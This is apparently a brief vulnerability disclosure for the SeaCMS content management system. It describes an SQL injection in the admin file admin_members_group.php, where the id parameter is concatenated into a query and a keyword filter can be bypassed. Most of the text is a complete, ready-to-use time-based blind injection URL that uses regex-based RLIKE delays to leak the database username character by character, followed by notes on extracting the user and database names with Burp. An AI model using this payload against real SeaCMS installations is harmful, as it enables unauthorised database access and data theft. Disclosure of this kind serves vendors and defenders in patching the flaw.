Download address on official website: https://www.seacms.net
Through code audit, the vulnerability points are/5owghc/admin_members_group.php
Note: after the program is installed, the background directory will be renamed randomly. Here it is changed to 5oghc
Line 55 variable $id spliced into SQL query,Follow up GetOne function,Using checksql function to filter the key words of SQL injection for variables,Can be bypassed。Use regular DOS RLIKE injection。Principle, using SQL to calculate the regular consumption of computing resources multiple times to produce a delay effect
Payload
http://10.2.7.9/5owghc/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
Use burp to get the current database username.
Use burp to get the current database name.
So there is a SQL injection vulnerability


